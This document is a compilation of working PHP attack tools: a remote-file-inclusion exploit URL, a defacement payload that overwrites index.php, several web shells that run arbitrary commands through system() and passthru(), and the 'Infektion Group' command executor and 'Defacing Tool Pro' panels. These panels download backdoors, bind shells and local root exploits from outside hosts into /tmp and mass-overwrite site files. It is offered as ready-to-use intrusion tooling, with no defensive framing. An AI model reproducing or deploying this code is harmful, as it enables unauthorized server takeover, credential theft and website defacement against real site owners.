script_vulnerable.php?variable_vulnerable=http://www.ejemplo.com/ejemplo.txt

<?
$fp=fopen("index.php","w+");

fwrite($fp,"<title>Hacked</title>
<body bgcolor="#000000" text="#FF9900">
<center>
<font face="Fixedsys">
<font size="6">Hacked</font><br>
<font size="2">Own yOur B0x!</font>
</center> \n");
fclose($fp);
?>

<?
  // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
  if (isset($chdir)) @chdir($chdir);
  ob_start();
   passthru("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
  $output = ob_get_contents();
  ob_end_clean();
  if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
?>

ndex.php?module=http://pagina.com/exploit.gif?cmd=comando

<?php /* Muestra el código de la página pasada por la variable cmd. Funciona en servidores con safe_mode off como todos los demás scripts */
$cmd=$_GET['cmd'];
show_source($cmd);
?>

<?
/* Este archivo muestra el código fuente del archivo que se pasa por el método GET, mediante la variable file. */
$file=$_GET[file];
show_source($file);
?>

<?php /* En el form hay que cambiar la variable file por la que use la web para introducir los archivos */
if (isset($enviar)) {
$directorio=opendir(".");
while ($archivo=readdir($directorio)) {
echo $archivo . "<br>";
}
$nombre="paisterist.html";
copy($sarasa, $HTTP_POST_FILES['sarasa']['name']);
if (file_exists($HTTP_POST_FILES['sarasa']['name'])) print $HTTP_POST_FILES['sarasa']['name'];
else print "No pudo subirse el archivo.";
}
 else {
?>
<form method=post action=index.php?file=http://tuserver.com/exploit.gif enctype="multipart/form-data">
<input type=file name=sarasa>
<input type=submit name=enviar value="Enviar Archivo">
</form>
<? } ?>

<?php
$directorio=opendir("."); /* Pueden bajar directorios con ../ o bien, fijarse en otros... */
while ($archivo=readdir($directorio)) {
print $archivo . "<br>";
}
?>

<?
/* Para este script necesitan los datos de la conexión a la base de datos salvo que la conexión ya este establecida en el index. Si la conexión no está establecida, hay que hacerla.*/
while ($i<mysql_num_rows($listar)) {
$nombre_base[$i]=mysql_tablename($listar, $i);
print $nombre_base[$i]."<br>";
$i++;
}
?>

<? /* Ejecuta el comando pasado por la variable cmd en la shell nobody. Podemos hacer cosas como ver el shadow y el passwd por ejemplo. */
$cmd=$_GET['cmd'];
system($cmd);
?>

<CENTER><DIV STYLE="font-family: verdana; font-size: 18px; font-weight: bold; color: #FF0000;">Infektion Group</DIV>
<BR><DIV STYLE="font-family: verdana; font-size: 16px; font-weight: bold; color: #FF0000;">Executor de Comandos v4.3</DIV>
<?php
  closelog( );
  $login = posix_getuid( );
  $euid = posix_geteuid( );
  $gid = posix_getgid( );
  if ($chdir == "") $chdir = getcwd( );

?>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="0">
<?php

  $uname = posix_uname( );
  while (list($info, $value) = each ($uname)) {

?>
  <TR>
    <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><?= $info ?>: <?= $value ?></DIV></TD>
  </TR>
<?php
  }
?>

  <TR>
  <TD><DIV STYLE="font-family: verdana; font-size: 10px;">Usuário: uid(<?= $login ?>) euid(<?= $euid ?>) gid(<?= $gid ?>)</DIV></TD>
  </TR>
  <TR>
  <TD><DIV STYLE="font-family: verdana; font-size: 10px;">Diretório Atual: <?= $chdir ?></DIV></TD>
  </TR>
  <TR>
  <TD><DIV STYLE="font-family: verdana; font-size: 10px;">Permissão de Escrita: <? if(@is_writable($chdir)){ echo "Sim"; }else{ echo "Não"; } ?></DIV></TD>
  </TR>
  <TR>
  <TD><DIV STYLE="font-family: verdana; font-size: 10px;">Servidor: <?= "$SERVER_SOFTWARE $SERVER_VERSION"; ?></DIV></TD>
  </TR>
</TABLE>
<BR>
<?php
  if ($cmd != "") {
?>

<DIV STYLE="font-family: verdana; font-size: 12px; font-weight: bold; color: #FF0000;">Comando</DIV>
<?php
   if (isset($chdir)) @chdir($chdir);
   ob_start( );
     passthru("$cmd  2>&1");
     $output = ob_get_contents();
   ob_end_clean( );
?>
<TEXTAREA COLS="75" ROWS="8" STYLE="font-family: verdana; font-size: 10px;">
<?php
    if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));
?>
</TEXTAREA>
<BR>
<?php
  }
?>

<?php

  if ($bs == "1") {
  $fp = @fopen("http://www.infektiongroup.hpg.com.br/xpl/bd/bshell",r);
  $fp2 = @fopen("/tmp/bs","w");
  fwrite($fp2, "");
  $fp1 = @fopen("/tmp/bs","a+");
  for (;;) {
    $read = @fread($fp, 4096);
    if (empty($read)) break;
    $ok = fwrite($fp1, $read);

    if (empty($ok)) {
      echo "<DIV STYLE=\"font-family: verdana; font-size: 12px;\">[-] Erro</DIV>";
      break;
    }
  }

  if (!empty($ok)) {
    echo "<DIV STYLE=\"font-family: verdana; font-size: 12px;\">[*] Arquivo Enviado</DIV>";
  }
}

if ($brk == "1") {
  $fp = @fopen("http://www.infektiongroup.hpg.com.br/xpl/local/brk",r);
  $fp2 = @fopen("/tmp/brk","w");
  fwrite($fp2, "");
  $fp1 = @fopen("/tmp/brk","a+");
  for (;;) {
    $read = @fread($fp, 4096);
    if (empty($read)) break;
    $ok = fwrite($fp1, $read);

    if (empty($ok)) {
      echo "<DIV STYLE=\"font-family: verdana; font-size: 12px;\">[-] Erro</DIV>";
      break;
    }
  }

  if (!empty($ok)) {
    echo "<DIV STYLE=\"font-family: verdana; font-size: 12px;\">[*] Arquivo Enviado</DIV>";
  }
}

?>
</CENTER>
<pre><font face="Tahoma" size="2">
<?php

if ($dx != "") {
  $fp = @fopen("$hostxpl",r);
  $fp2 = @fopen("$storage","w");
  fwrite($fp2, "");
  $fp1 = @fopen("$storage","a+");
  for (;;) {
    $read = @fread($fp, 4096);
    if (empty($read)) break;
    $ok = fwrite($fp1, $read);

    if (empty($ok)) {
      echo "<DIV STYLE=\"font-family: verdana; font-size: 12px;\">[-] Erro</DIV>";
      break;
    }
  }

  if (!empty($ok)) {
    echo "<DIV STYLE=\"font-family: verdana; font-size: 12px;\">[*] Arquivo Enviado</DIV>";
  }
}

flush( );

?>
<?
if ($kmod == "1") {
  $fp = @fopen("http://www.vrfhp.hpg.com.br/pow20/kmod",r);
  $fp2 = @fopen("/tmp/kmod","w");
  fwrite($fp2, "");
  $fp1 = @fopen("/tmp/kmod","a+");
  for (;;) {
    $read = @fread($fp, 4096);
    if (empty($read)) break;
    $ok = fwrite($fp1, $read);

    if (empty($ok)) {
      echo "<DIV STYLE=\"font-family: verdana; font-size: 12px;\">[-] Erro</DIV>";
      break;
    }
  }
  if (!empty($ok)) {
    echo "<DIV STYLE=\"font-family: verdana; font-size: 12px;\">[*] Arquivo Enviado</DIV>";
  }
}
?>
<?
if ($mremap == "1") {
  $fp = @fopen("http://www.infektiongroup.hpg.com.br/xpl/local/local4",r);
  $fp2 = @fopen("/tmp/local4","w");
  fwrite($fp2, "");
  $fp1 = @fopen("/tmp/local4","a+");
  for (;;) {
    $read = @fread($fp, 4096);
    if (empty($read)) break;
    $ok = fwrite($fp1, $read);

    if (empty($ok)) {
      echo "<DIV STYLE=\"font-family: verdana; font-size: 12px;\">[-] Erro</DIV>";
      break;
    }
  }
  if (!empty($ok)) {
    echo "<DIV STYLE=\"font-family: verdana; font-size: 12px;\">[*] Arquivo Enviado</DIV>";
  }
}
?>
<?
if ($cgi == "1") {
  $fp = @fopen("http://www.infektiongroup.hpg.com.br/xpl/bd/cgi",r);
  $fp2 = @fopen("/tmp/cgi","w");
  fwrite($fp2, "");
  $fp1 = @fopen("/tmp/cgi","a+");
  for (;;) {
    $read = @fread($fp, 4096);
    if (empty($read)) break;
    $ok = fwrite($fp1, $read);

    if (empty($ok)) {
      echo "<DIV STYLE=\"font-family: verdana; font-size: 12px;\">[-] Erro</DIV>";
      break;
}
}
  if (!empty($ok)) {
    echo "<DIV STYLE=\"font-family: verdana; font-size: 12px;\">[*] Arquivo Enviado</DIV>";
}
}
?>
<?
if ($mass == "1") {
  $fp = @fopen("http://www.infektiongroup.hpg.com.br/xpl/local/mass.jpg",r);
  $fp2 = @fopen("$d","w");
  fwrite($fp2, "");
  $fp1 = @fopen("$d","a+");
  for (;;) {
    $read = @fread($fp, 4096);
    if (empty($read)) break;
    $ok = fwrite($fp1, $read);
    if (empty($ok)) {
      echo "<DIV STYLE=\"font-family: verdana; font-size: 12px;\">[-] Erro</DIV>";
      break;
}
}
  if (!empty($ok)) {
    echo "<DIV STYLE=\"font-family: verdana; font-size: 12px;\">[*] Arquivo Enviado</DIV>";
}
}
?>
</font></pre>

<!--
Defacing Tool Pro v1.6 by r3v3ng4ns
Autor: r3v3ng4ns - revengans@hotmail.com
Modifique, copie e distribua mas, por favor, mantenha o nome dos autores originais
-->
<?php
@closelog();
@error_reporting(0);
$vers="1.6beta";
$remote_addr="http://127.0.0.1/~snagnever/defacement/paginanova/";//url
$format_addr=".txt";//formato
$string_addr=$remote_addr."pro16".$format_addr;//cmd
$safe_addr=$remote_addr."safe16".$format_addr;//safemode
$writer_addr=$remote_addr."writer16".$format_addr;//writer
$phpget_addr=$remote_addr."get16".$format_addr;//phpget
$feditor_addr=$remote_addr."feditor".$format_addr;//main feditor
$put_addr=$remote_addr."feditor_put".$format_addr;//file writer
$total_addr="http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
$chdir=$_GET['chdir'];
if($chdir=="")$chdir=getcwd();

$cmd=$_GET['cmd'];
$cmd=stripslashes($cmd);
$ch_msg="";
$login=@posix_getuid();
$euid=@posix_geteuid();
$gid=@posix_getgid();

if (strpos($cmd, 'chdir')!==false and strpos($cmd, 'chdir')=='0'){
   $boom = explode(" ",$cmd,2);
   $boom2 = explode(";",$boom['1'], 2);
   $diretorio = $boom2['0'];

   if($boom['1']=="/")$chdir="";
   else if(strpos($cmd, 'chdir ..')!==false){
     $cadaDir = array_reverse(explode("/",$chdir));
     if($cadaDir['0']=="" or $cadaDir['0'] ==" ") $lastDir = $cadaDir['1']."/";
     else{ $lastDir = $cadaDir['0']."/"; $chdir = $chdir."/";}
     $diretorio = str_replace($lastDir,"",$chdir);
     if($diretorio=="/")$chdir="";
   }
   if(strrpos($diretorio,"/")==(strlen($diretorio)-1)) $diretorio=substr($diretorio,0,strrpos($diretorio,"/"));
   if(@opendir($diretorio)!==false) $chdir=$diretorio;
   else if(@opendir($chdir."/".$diretorio)!==false) $chdir=$chdir."/".$diretorio;
   else $ch_msg="dtool: line 1: chdir: $diretorio: No such directory or permission denied.\n";
   if($boom2['1']==null) $cmd = $boom['2']; else $cmd = $boom2['1'].$boom2['2'];
}
$cmdshow=$cmd;
if($chdir==getcwd() or empty($chdir) or $chdir=="")$showdir="";else $showdir="+'chdir=$chdir&'";

if (@is_dir("/usr/X11R6/")) $pro0="<i>X11</i> em /usr/X11R6/, ";
if (@file_exists("/usr/X11R6/bin/xterm")) $pro1="<i>xterm</i> em /usr/X11R6/bin/xterm, ";
if (@file_exists("/usr/bin/nc")) $pro2="<i>nc</i> em /usr/bin/nc, ";
if (@file_exists("/usr/bin/wget")) $pro3="<i>wget</i> em /usr/bin/wget, ";
if (@file_exists("/usr/bin/lynx")) $pro4="<i>lynx</i> em /usr/bin/lynx, ";
$ip=@gethostbyname($_SERVER['HTTP_HOST']);
$pro=$pro0.$pro1.$pro2.$pro3.$pro4;

if(strpos($cmd, 'ls --') !==false){ $cmd = str_replace('ls --', 'ls -F --', $cmd);}
else if(strpos($cmd, 'ls -') !==false){ $cmd = str_replace('ls -', 'ls -F', $cmd);}
else if(strpos($cmd, ';ls') !==false){ $cmd = str_replace(';ls', ';ls -F', $cmd);}
else if(strpos($cmd, '; ls') !==false){ $cmd = str_replace('; ls', ';ls -F', $cmd);}
else if($cmd=='ls'){$cmd = "ls -F";}
if(strpos($chdir, '//') !==false) $chdir = str_replace('//', '/', $chdir);
?>
<body onload="window.document.c.comando.focus();window.document.c.comando.select();">
<style>.campo{font-family: Verdana; color:white;font-size:11px;background-color:#414978;}
.infop{font-family: verdana; font-size: 10px; color:#000000;}
.infod{font-family: verdana; font-size: 10px; color:#414978;}
.algod{font-family: verdana; font-size: 12px; font-weight: bold; color: #414978;}
.titulod{font:Verdana; color:#414978; font-size:20px;}</style>
<script>
function inclVar(){var addr = location.href.substring(0,location.href.indexOf('?')+1);var stri = location.href.substring(addr.length,location.href.length+1);inclvar = stri.substring(0,stri.indexOf('='));}
function enviaCMD(){inclVar();window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$string_addr;?>'+'?&'<?=$showdir;?>+'cmd='+window.document.c.comando.value;return false;}
function PHPget(){inclVar();var c=prompt("[ PHPget ] by r3v3ng4ns\nDigite a ORIGEM do arquivo (url) com ate 7Mb\n-Utilize caminho completo\n-Se for remoto, use http:// ou ftp://:","");var dir = c.substring(0,c.lastIndexOf('/')+1);var file = c.substring(dir.length,c.length+1);var p=prompt("[ PHPget ] by r3v3ng4ns\nDigite o DESTINO do arquivo\n-Utilize caminho completo\n-O diretorio de destino deve ser writable","<?=$chdir;?>/"+file);window.open('<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$phpget_addr;?>'+'?&'+'inclvar='+inclvar+'&'<?=$showdir;?>+'c='+c+'&p='+p);}
function PHPwriter(){inclVar();var url=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite a URL do frame","http://www.geocities.com/revensite/index.htm");var dir = url.substring(0,url.lastIndexOf('/')+1);var file = url.substring(dir.length,url.length+1);var f=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite o Nome do arquivo a ser criado\n-Utilize caminho completo\n-O diretorio de destino deve ser writable","<?=$chdir;?>/"+file); t=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite o Title da pagina","[ r00ted team ] owned you :P");window.open('<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$writer_addr;?>'+'?&'+'inclvar='+inclvar+'&'<?=$showdir;?>+'url='+url+'&f='+f+'&t='+t);}
function resumir() {inclVar();
resumo='<DIV STYLE="font-family: verdana; font-size: 11px;"><b> <?=$total_addr;?>?'+inclvar+'=<?=$string_addr;?></b><br><?php
 $uname = posix_uname();
 while (list($info, $value) = each ($uname)) { ?><b><?= $info ?>:</b> <?= $value ?><br><?php } ?><b>default user:</b> uid(<?= $login ?>) euid(<?= $euid ?>) gid(<?= $gid ?>)<br><b>ip: </b> <?=$ip;?><br><b>server info: </b><?="$SERVER_SOFTWARE $SERVER_VERSION";?><br><b>pro info: </b><?=$pro;?><br><b>path da pagina: </b><?= getcwd() ?><br><b>path writable:</b><? if(@is_writable(getcwd())){ echo " <b>YES</b>"; }else{ echo " no"; } ?>'
jan=open("","jan","width=580,height=300,menubar=yes,scrollbars=yes,resizable=yes,");jan.document.write(resumo);jan.document.write("<p> <? echo str_repeat("==", 35)?></p>");jan.document.title="Resumo do servidor";jan.focus();}
function PHPf(){inclVar();var o=prompt("[ PHPfilEditor ] by r3v3ng4ns\nDigite o nome do arquivo que deseja abrir\n-Utilize caminho completo\n-Abrir arquivos remotos, use http:// ou ftp://","<?=$chdir;?>/index.php"); var dir = o.substring(0,o.lastIndexOf('/')+1);var file = o.substring(dir.length,o.length+1);window.open('<?=$total_addr;?>?'+inclvar+'=<?=$feditor_addr;?>?&inclvar='+inclvar+'&o='+o);}
function safeMode(){inclVar();if (confirm ('Deseja ativar o DTool com suporte a SafeMode?')){window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$safe_addr;?>'+'&'<?=$showdir;?>;}else{ return false }}
</script>
<table width="690" border="0" align="center" cellpadding="2" cellspacing="0" bgcolor="#FFFFFF">
<tr><td><div align="center" class="titulod"><b>[ Defacing Tool Pro v<?=$vers;?> ] <a href="javascript:window.open('<?=$remote_addr;?>help.txt');">?</a><br>
<font size=2>by r3v3ng4ns - revengans@hotmail.com </font>
</b></div></td></tr>
<tr><td><TABLE width="370" BORDER="0" align="center" CELLPADDING="0" CELLSPACING="0">
<?php
 $uname = @posix_uname();
 while (list($info, $value) = each ($uname)) { ?>
<TR><TD><DIV class="infop"><b><?=$info ?>:</b> <?=$value;?></DIV></TD></TR><?php } ?>
<TR><TD><DIV class="infop"><b>user:</b> uid(<?=$login;?>) euid(<?=$euid;?>) gid(<?=$gid;?>)</DIV></TD></TR>
<TR><TD><DIV class="infod"><b>write permission:</b><? if(@is_writable($chdir)){ echo " <b>YES</b>"; }else{ echo " no"; } ?></DIV></TD></TR>
<TR><TD><DIV class="infop"><b>server info: </b><?="$SERVER_SOFTWARE $SERVER_VERSION";?></DIV></TD></TR>
<TR><TD><DIV class="infop"><b>pro info: ip </b><?="$ip, $pro";?></DIV></TD></TR>
<? if($chdir!=getcwd()){?>
<TR><TD><DIV class="infop"><b>original path: </b><?=getcwd() ?></DIV></TD></TR><? } ?>
<TR><TD><DIV class="infod"><b>current path: </b><?=$chdir ?>
</DIV></TD></TR></TABLE></td></tr>
<tr><td><form name="c" id="c" method="post" action="#" onSubmit="return enviaCMD()">
<table width="375" border="1" align="center" cellpadding="0" cellspacing="0" bordercolor="#414978"><tr><td><table width="370" border="0" align="center" cellpadding="1" cellspacing="1" bgcolor="white"><tr>
<td width="75"><DIV class="algod">command</DIV></td>
<td width="300"><input name="comando" type="text" id="comando" value='<?=$cmdshow;?>' style="width:295; font-size:12px" class="campo">
</td></tr></table><table><tr><td>
<?php
if(isset($chdir)) @chdir($chdir);
ob_start();
function safemode($what){echo "It seems that this server is using php in safemode. Try to use DTool in Safemode.";}
$funE="function_exists";
if($funE('passthru'))$fe="passthru";
elseif($funE('system'))$fe="system";
elseif($funE('shell_exec'))$fe="shell_exec";
else $fe="safemode";
$fe("$cmd  2>&1");
$output=ob_get_contents();ob_end_clean();
?>
<td><input type="button" name="snd" value="snd cmd" class="campo" onClick="enviaCMD()"><input type="button" name="getBtn" value="PHPget" class="campo" onClick="PHPget()"><input type="button" name="writerBtn" value="PHPwriter" class="campo" onClick="PHPwriter()"><input type="button" name="edBtn" value="Fileditor" class="campo" onClick="PHPf()"><input type="button" name="resBtn" value="resumir" class="campo" onClick="resumir()"><input type="button" name="smBtn" value="safemode" class="campo" onClick="safeMode()"><input type="button" name="gsBtn" value="open shell" class="campo" onClick="inclVar();window.open('<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$remote_addr;?>pro16s.txt');"
</tr></table></td></tr></table></form></td></tr>
<tr><td align="center"><DIV class="algod"><br>stdOut from <?="\"<i>$cmdshow</i>\", using <i>$fe()</i>";?></i></DIV>
<TEXTAREA name="output_text" COLS="90" ROWS="10" STYLE="font-family:Courier; font-size: 12px; color:#FFFFFF; font-size:11 px; background-color:black;width:683;">
<?php
echo $ch_msg;
if (empty($cmd) and $ch_msg=="") echo ("Comandos Exclusivos do DTool Pro\n\nchdir <diretorio>; outros; cmds;\nMuda o diretorio para aquele especificado e permanece nele. Precisa ser o primeiro da linha. ex: chdir /diretorio/sub/;pwd;ls\n\nPHPget, PHPwriter, PHPfilEditor e Resumir\nconsulte http://www.geocities.com/revensite/help.txt");
if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));
?></TEXTAREA><BR></td></tr></table>

<!--
Defacing Tool 2.0 by r3v3ng4ns
revengans@gmail.com
se for modificar o codigo, por favor, mantenha o nome de seus autores originais
e por favor, entre em contato comigo...

ae galera, serio, tem mta gente fdp q simplismente usa, nao seja soh um sucker do script,
n seja um lammer imbecil, n seja o merda dum script kiddie, n seja um babaca, ajude a melhora-lo tambem!!
-->
<?php

//The Rules
include("http://ess.trix.net/therules.dat");

if(empty($chdir)) $chdir = @$_GET['chdir'];
if(empty($cmd)) $cmd = @$_GET['cmd'];
if(empty($fu)) $fu = @$_GET['fu'];
if(empty($list)) $list = @$_GET['list'];
if(empty($evalcode)) $evalcode = @$_GET['evalcode'];

if(empty($chdir) or $chdir=='') $chdir=getcwd();
$cmd = stripslashes(trim($cmd));


//CHDIR tool
if (strpos($cmd, 'chdir')!==false and strpos($cmd, 'chdir')=='0'){
   $boom = explode(" ",$cmd,2);
   $boom2 = explode(";",$boom['1'], 2);
   $toDir = $boom2['0'];

   if($boom['1']=="/")$chdir="";
   else if(strpos($cmd, 'chdir ..')!==false){
      $cadaDir = array_reverse(explode("/",$chdir));

      if($cadaDir['0']=="" or $cadaDir['0'] ==" ") $lastDir = $cadaDir['1']."/";
      else{ $lastDir = $cadaDir['0']."/"; $chdir = $chdir."/";}
      $toDir = str_replace($lastDir,"",$chdir);
      if($toDir=="/")$chdir="";
   }
   else if(strpos($cmd, 'chdir .')===0) $toDir = getcwd();
   else if(strpos($cmd, 'chdir ~')===0) $toDir = getcwd();

   if(strrpos($toDir,"/")==(strlen($toDir)-1)) $toDir=substr($toDir,0,strrpos($toDir,"/"));
   if(@opendir($toDir)!==false or @is_dir($toDir)) $chdir=$toDir;
   else if(@opendir($chdir."/".$toDir)!==false or @is_dir($chdir."/".$toDir)) $chdir=$chdir."/".$toDir;
   else $ch_msg="dtool: line 1: chdir: $toDir: No such directory.\n";
   if($boom2['1']==null) $cmd = trim($boom['2']); else $cmd = trim($boom2['1'].$boom2['2']);
   if(strpos($chdir, '//')!==false) $chdir = str_replace('//', '/', $chdir);
}
if(!@opendir($chdir)) $ch_msg="dtool: line 1: chdir: It seems that the permission have been denied in dir '$chdir'. Anyway, you can try to send a command here now. If you haven't accessed it, try to use 'cd' in the cmd line instead.\n";
$cmdShow = $cmd;

//To keep the changes in the url, when using the 'GET' way to send php variables
if(empty($post)){
   if($chdir==getcwd() or empty($chdir) or $chdir=="")$showdir="";else $showdir="+'chdir=$chdir&'";
   if($fu=="" or $fu=="0" or empty($fu))$showfu="";else $showfu="+'fu=$fu&'";
   if($list=="" or $list=="0" or empty($list)){$showfl="";$fl="on";}else{$showfl="+'list=1&'"; $fl="off";}
}

if( !empty($evalcode) ) include($evalcode);

//INFO table (pro and normal)
if (@file_exists("/usr/X11R6/bin/xterm")) $pro1="<i>xterm</i> at /usr/X11R6/bin/xterm, ";
if (@file_exists("/usr/bin/nc")) $pro2="<i>nc</i> at /usr/bin/nc, ";
if (@file_exists("/usr/bin/wget")) $pro3="<i>wget</i> at /usr/bin/wget, ";
if (@file_exists("/usr/bin/lynx")) $pro4="<i>lynx</i> at /usr/bin/lynx, ";
if (@file_exists("/usr/bin/gcc")) $pro5="<i>gcc</i> at /usr/bin/gcc, ";
if (@file_exists("/usr/bin/cc")) $pro6="<i>cc</i> at /usr/bin/cc ";
$safe = @ini_get($safemode);
if ($safe) $pro8="<b><i>safe_mode</i>: YES</b>, "; else $pro7="<b><i>safe_mode</i>: NO</b>, ";
$pro8 = "<i>PHP </i>".phpversion();
$pro=$pro1.$pro2.$pro3.$pro4.$pro5.$pro6.$pro7.$pro8;
$login=@posix_getuid(); $euid=@posix_geteuid(); $gid=@posix_getgid();
$ip=@gethostbyname($_SERVER['HTTP_HOST']);

//Turns the 'ls' command more usefull, showing it as it looks in the shell
if(strpos($cmd, 'ls --') !==false) $cmd = str_replace('ls --', 'ls -F --', $cmd);
else if(strpos($cmd, 'ls -') !==false) $cmd = str_replace('ls -', 'ls -F', $cmd);
else if(strpos($cmd, ';ls') !==false) $cmd = str_replace(';ls', ';ls -F', $cmd);
else if(strpos($cmd, '; ls') !==false) $cmd = str_replace('; ls', ';ls -F', $cmd);
else if($cmd=='ls') $cmd = "ls -F";

//If there are some '//' in the cmd, its now removed
if(strpos($chdir, '//')!==false) $chdir = str_replace('//', '/', $chdir);
?>
<body onload="focar();">
<style>.campo{font-family: Verdana; color:white;font-size:11px;background-color:#414978;height:23px}
.infop{font-family: verdana; font-size: 10px; color:#000000;}
.infod{font-family: verdana; font-size: 10px; color:#414978;}
.algod{font-family: verdana; font-size: 12px; font-weight: bold; color: #414978;}
.titulod{font:Verdana; color:#414978; font-size:20px;}</style>
<script>
function inclVar(){var addr = location.href.substring(0,location.href.indexOf('?')+1);var stri = location.href.substring(addr.length,location.href.length+1);inclvar = stri.substring(0,stri.indexOf('='));}
function enviaCMD(){inclVar();window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$cmd_addr;?>'+'?&'<?=$showdir.$showfu.$showfl;?>+'cmd='+window.document.formulario.cmd.value;return false;}
function ativaFe(qual){inclVar();window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$cmd_addr;?>'+'?&'<?=$showdir.$showfl;?>+'fu='+qual+'&cmd='+window.document.formulario.cmd.value;return false;}
function PHPget(){inclVar(); if(confirm("O PHPget agora oferece uma lista pronta de urls,\nvc soh precisa escolher qual arquivo enviar para o servidor.\nDeseja utilizar isso? \nClique em Cancel para usar o PHPget normal, ou \nem Ok para usar esse novo recurso."))goPreGet(); else{var c=prompt("[ PHPget ] by r3v3ng4ns\nDigite a ORIGEM do arquivo (url) com ate 7Mb\n-Utilize caminho completo\n-Se for remoto, use http:// ou ftp://:","http://hostinganime.com/tool/nc.dat");var dir = c.substring(0,c.lastIndexOf('/')+1);var file = c.substring(dir.length,c.length+1);var p=prompt("[ PHPget ] by r3v3ng4ns\nDigite o DESTINO do arquivo\n-Utilize caminho completo\n-O diretorio de destino deve ser writable","<?=$chdir;?>/"+file);window.open('<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$phpget_addr;?>'+'?&'+'inclvar='+inclvar+'&'<?=$showdir;?>+'c='+c+'&p='+p);}}
function goPreGet(){inclVar();window.open('<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$phpget_addr;?>'+'?&'+'inclvar='+inclvar+'&'<?=$showdir;?>+'pre=1');}
function PHPwriter(){inclVar();var url=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite a URL do frame","http://hostinganime.com/tool/reven.htm");var dir = url.substring(0,url.lastIndexOf('/')+1);var file = url.substring(dir.length,url.length+1);var f=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite o Nome do arquivo a ser criado\n-Utilize caminho completo\n-O diretorio de destino deve ser writable","<?=$chdir;?>/"+file); t=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite o Title da pagina","[ r00ted team ] owned you :P - by r3v3ng4ns");window.open('<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$writer_addr;?>'+'?&'+'inclvar='+inclvar+'&'<?=$showdir;?>+'url='+url+'&f='+f+'&t='+t);}
function PHPf(){inclVar();var o=prompt("[ PHPfilEditor ] by r3v3ng4ns\nDigite o nome do arquivo que deseja abrir\n-Utilize caminho completo\n-Abrir arquivos remotos, use http:// ou ftp://","<?=$chdir;?>/index.php"); var dir = o.substring(0,o.lastIndexOf('/')+1);var file = o.substring(dir.length,o.length+1);window.open('<?=$total_addr;?>?'+inclvar+'=<?=$feditor_addr;?>?&inclvar='+inclvar+'&o='+o);}
function safeMode(){inclVar();if (confirm ('Deseja ativar o DTool com suporte a SafeMode?')){window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$safe_addr;?>'+'?&'<?=$showdir;?>;}else{ return false }}
function list(turn){inclVar();if(turn=="off")turn=0;else if(turn=="on")turn=1; window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$cmd_addr;?>'+'?&'<?=$showdir.$showfu;?>+'list='+turn+'&cmd='+window.document.formulario.cmd.value;return false;}
function overwrite(){inclVar();if(confirm("O script tentara substituir todos os arquivos (do diretorio atual) que\nteem no nome a palavra chave especificada. Os arquivos serao\nsubstituidos pelo novo arquivo, especificado por voce.\n\nLembre-se!\n-Se for para substituir arquivos com a extensao jpg, utilize\ncomo palavra chave .jpg (inclusive o ponto!)\n-Utilize caminho completo para o novo arquivo, e se for remoto,\nutilize http:// e ftp://")){keyw=prompt("Digite a palavra chave",".jpg");newf=prompt("Digite a origem do arquivo que substituira","http://www.colegioparthenon.com.br/ingles/bins/revenmail.jpg");if(confirm("Se ocorrer um erro e o arquivo nao puder ser substituido, deseja\nque o script apague os arquivos e crie-os novamente com o novo conteudo?\nLembre-se de que para criar novos arquivos, o diretorio deve ser writable.")){trydel=1}else{trydel=0} if(confirm("Deseja substituir todos os arquivos do diretorio\n<?=$chdir;?> que contenham a palavra\n"+keyw+" no nome pelo novo arquivo de origem\n"+newf+" ?\nIsso pode levar um tempo, dependendo da quantidade de\narquivos e do tamanho do arquivo de origem.")){window.location.href='<?=$total_addr;?>?'+inclvar+'=<?=$cmd_addr;?>?&chdir=<?=$chdir;?>&list=1&'<?=$showfu?>+'&keyw='+keyw+'&newf='+newf+'&trydel='+trydel;return false;}}}
</script>
<table width="760" border="0" align="center" cellpadding="2" cellspacing="0" bgcolor="#FFFFFF">
<tr><td><div align="center" class="titulod"><b>[ Defacing Tool Pro v<?=$vers;?> ] <a href="mailto:revengans@gmail.com">?</a></font><br>
<font size=3>by r3v3ng4ns - revengans@gmail.com </font>
</b></div></td></tr>
<tr><td><TABLE width="370" BORDER="0" align="center" CELLPADDING="0" CELLSPACING="0">
<?php
 $uname = @posix_uname();
 while (list($info, $value) = each ($uname)) { ?>
<TR><TD><DIV class="infop"><b><?=$info ?>:</b> <?=$value;?></DIV></TD></TR><?php } ?>
<TR><TD><DIV class="infop"><b>user:</b> uid(<?=$login;?>) euid(<?=$euid;?>) gid(<?=$gid;?>)</DIV></TD></TR>
<TR><TD><DIV class="infod"><b>write permission:</b><? if(@is_writable($chdir)){ echo " <b>YES</b>"; }else{ echo " no"; } ?></DIV></TD></TR>
<TR><TD><DIV class="infop"><b>server info: </b><?="$SERVER_SOFTWARE $SERVER_VERSION";?></DIV></TD></TR>
<TR><TD><DIV class="infop"><b>pro info: ip </b><?="$ip, $pro";?></DIV></TD></TR>
<? if($chdir!=getcwd()){?>
<TR><TD><DIV class="infop"><b>original path: </b><?=getcwd() ?></DIV></TD></TR><? } ?>
<TR><TD><DIV class="infod"><b>current path: </b><?=$chdir ?>
</DIV></TD></TR></TABLE></td></tr>
